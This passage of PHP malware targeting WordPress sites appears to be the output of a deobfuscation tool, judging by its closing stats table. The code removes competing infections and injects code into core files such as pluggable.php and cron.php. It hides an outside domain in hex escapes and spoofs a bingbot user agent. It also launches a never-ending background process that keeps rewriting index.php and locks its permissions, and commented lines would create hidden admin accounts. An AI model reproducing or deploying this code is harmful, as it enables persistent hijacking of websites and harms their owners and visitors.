$new_content = preg_replace('/\/\/ cyborg_start[\s\S]*?\/\/ cyborg_end/', '', $old_content);
file_put_contents($wordpress_filepath, $new_content);
$arr_logs[] = 'delete hidden code: ' . $wordpress_filepath;
}
}
foreach ($arr_wordpress_filename as $wordpress_filename => $needle) {
$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
if (!file_exists($wordpress_filepath)) {
continue;
}
$old_content = file_get_contents($wordpress_filepath);
if (preg_match('/\/\/c_start[\s\S]*?\/\/c_end/', $old_content)) {
$new_content = preg_replace('/\/\/c_start[\s\S]*?\/\/c_end/', '', $old_content);
$success = @file_put_contents($wordpress_filepath, $new_content);
$arr_msg[] = 'crack restore: ' . $wordpress_filepath . ' ' . ($success ? 'success' : 'fail');
}
}
// if (file_exists('wp-includes/fonts/dashicons.ttc')) {
// @unlink('wp-includes/fonts/dashicons.ttc');
// $arr_msg[] = "delete ttc ok";
// }
// if (file_exists('wp-admin/images/browser-tiny.png')) {
// @unlink('wp-admin/images/browser-tiny.png');
// $arr_msg[] = "delete png ok";
// }
$arr_msg[] = "pluggable " . cleancroncode($root.'/wp-includes/pluggable.php', "i = 'inde'.'x.php';", "if ( ! function_exists( 'wp_set_auth_cookie'");
$arr_msg[] = "cron " . cleancroncode($root.'/wp-includes/cron.php', "i = 'inde'.'x.php';", "function wp_get_schedules() {");
return $arr_msg;
}
function cleancroncode($file, $startstr, $endstr)
{
$msg = 'cron no code';
if (file_exists($file)) {
$ma = file_get_contents($file);
$start = strpos($ma, $startstr);
if ($start !== false) {
$head = substr($ma, 0, $start - 1);
$end = strpos($ma, $endstr);
$foot = substr($ma, $end);
file_put_contents($file, $head . $foot);
$msg = 'clear cron code';
} else {
$msg = 'cron no code';
}
}
return $msg;
}
function insertcroncode($file, $src, $beforetag)
{
// code
$c = file_get_contents($file);
$pn = file_put_contents($file, str_replace($beforetag, $src . "\n" . $beforetag, $c));
if ($pn) {
$msg = "line of $file ok";
} else {
$msg = "line of $file fail";
}
return $msg;
}
function output_message($result, $message_type = 'html', $html_tag = 'li')
{
if ($message_type != 'html') {
echo json_encode($result);
return;
}
if (!is_array($result)) {
return;
}
if (!isset($result['title'])) {
$result['title'] = '';
}
echo '---------start ' . $result['title'];
if (sizeof($result['message']) > 0) {
foreach ($result['message'] as $message) {
$message = str_replace('success', '<font color="blue">success</font>', $message);
$message = str_replace(' ok', '<font color="blue"> ok</font>', $message);
$message = str_replace('fail', '<font color="red">fail</font>', $message);
echo "<$html_tag>" . $message . "</$html_tag>";
}
}
if (isset($result['status']) && !empty($result['status'])) {
if ($result['status'] == 'ok') {
$status = '<font color="green">' . $result['status'] . '</font>';
}
if ($result['status'] == 'fail') {
$status = '<font color="red">' . $result['status'] . '</font>';
}
echo '---------end ' . $result['title'] . '===>status:' . $status;
} else {
$status = '<font color="green">ok</font>';
echo '---------end ' . $result['title'] . '===>status:' . $status;
}
echo "<br />";
echo "<br />";
}
function fi1($path)
{
global $root, $arpath8;
if ($handle = opendir($path)) {
while (($file = readdir($handle)) !== false) {
if ($file != "." && $file != "..") {
$pfile = $path . "/" . $file;
if (is_dir($pfile) && !is_link($pfile)) {
if (substr_count(str_replace($root . '/', '', $pfile), '/') < 3) {
fi1($pfile);
}
if (!file_exists($pfile . "/index.php")) {
array_push($arpath8, str_replace($root . '/', '', $pfile));
}
}
}
}
}
shuffle($arpath8);
}
function fp2($root)
{
global $root, $http, $host, $domain, $ht, $gov, $arpath8;
$p_arr = array();
$pnew_arr = array();
foreach ($arpath8 as $k => $v) {
$qupath = str_replace($root, "", $v);
$p_arr[$k] = explode("/", $qupath);
if (count($p_arr[$k]) >= 3) {
$pnew_arr[] = $v;
}
}
return $pnew_arr;
}
function rand_abc($length)
{
$str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$strlen = 52;
while ($length > $strlen) {
$str .= $str;
$strlen += 52;
}
$str = str_shuffle($str);
return substr($str, 0, $length);
}
function file_get_https($url, $timeout)
{
$arrContextOptions = array(
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false,
),
'http' => array(
'method' => "GET",
'timeout' => $timeout,
),
);
@file_get_contents($url, false, stream_context_create($arrContextOptions));
}
function auto_restore_cycle()
{
$arr_msg = array();
$code ="<?php set_time_limit(99 - 99);
ignore_user_abort(1);
function auto_restore_memory()
{
\$index_path = \$_SERVER['DOCUMENT_ROOT'] . '/index.php';
\$flag_filename = \$_SERVER['DOCUMENT_ROOT'] . '/3FNDICU2KH';
@unlink(\$flag_filename);
\$index_code = @file_get_contents(\$index_path);
while (1) {
clearstatcache();
if (file_exists(\$flag_filename)){
break;
}
if (!file_exists(\$index_path) or @file_get_contents(\$index_path) != \$index_code) {
@chmod(\$index_path, 438);
@unlink(\$index_path);
@file_put_contents(\$index_path, \$index_code);
@chmod(\$index_path, 292);
}
sleep(2);
}
}
ob_end_clean();
header(\"Connection: close\");
ob_start();
echo 888;
header(\"Content-Length: \" . ob_get_length());
ob_end_flush();
flush();
auto_restore_memory(); ?>";
$file_path = $_SERVER['DOCUMENT_ROOT'] . '/' . 'cyborg_tmp.php';
$success = @file_put_contents($file_path, $code);
$arr_msg[] = 'write tmp file: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
if (!$success) {
return $arr_msg;
}
$protocol = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$file_url = str_replace($_SERVER['DOCUMENT_ROOT'], $protocol . '://' . $_SERVER['HTTP_HOST'], $file_path);
file_get_https($file_url, 3);
$arr_msg[] = 'get: ' . $file_url . ' ok';
$success = @unlink($file_path);
$arr_msg[] = 'delete: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
return $arr_msg;
}
function hiddenma()
{
global $root, $http, $host, $ht, $gov, $sitemap_code_file, $oneline, $mode, $domain,$fsize;
$return_result = array();
$return_result['title'] = __FUNCTION__;
if (is_dir("wp-includes") && is_dir("wp-admin")) {
// if (file_exists("wp-config.php")) {
// $return_result['message'][] = adduser('wp-blog', '$P$BFHUiQbVj3FJKfYu/xB/LTghBaAXLe1', true);
// $return_result['message'][] = adduser('wp-user', '1bc83cec427917671aef3f1c63c150f9', false);
// }
$arr_msg = crack_auto_restore();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
$arr_msg = auto_restore_file();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
// $wcc_file=@file_get_contents($_SERVER['DOCUMENT_ROOT'].'/wp-content/cachef'));
$check_ginfo_url=$http.'://'.$host.'/?ginfo';
$check_staus=gfiocheck($check_ginfo_url);
if($check_staus)
{
$return_result['message'][] = 'ginfo:ok';
}
$arr_msg = auto_restore_cycle();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
}
return $return_result;
}
if (isset($_POST['message_type']) && !empty($_POST['message_type'])) {
$message_type = $_POST['message_type'];
} else {
$message_type = 'html';
}
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)";
$domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f";
$root = $_SERVER['DOCUMENT_ROOT'];
@chdir($root);
$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
$arpath8 = array();
fi1($root);
$fp2 = @fp2($root);
$ht =
'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
';
$hiddenma_result = hiddenma(); // 4
output_message($hiddenma_result, $message_type);
?>Function Calls
| None |
Stats
| MD5 | aab075c5fc5a4067843927dd70667b8d |
| Eval Count | 0 |
| Decode Time | 66 ms |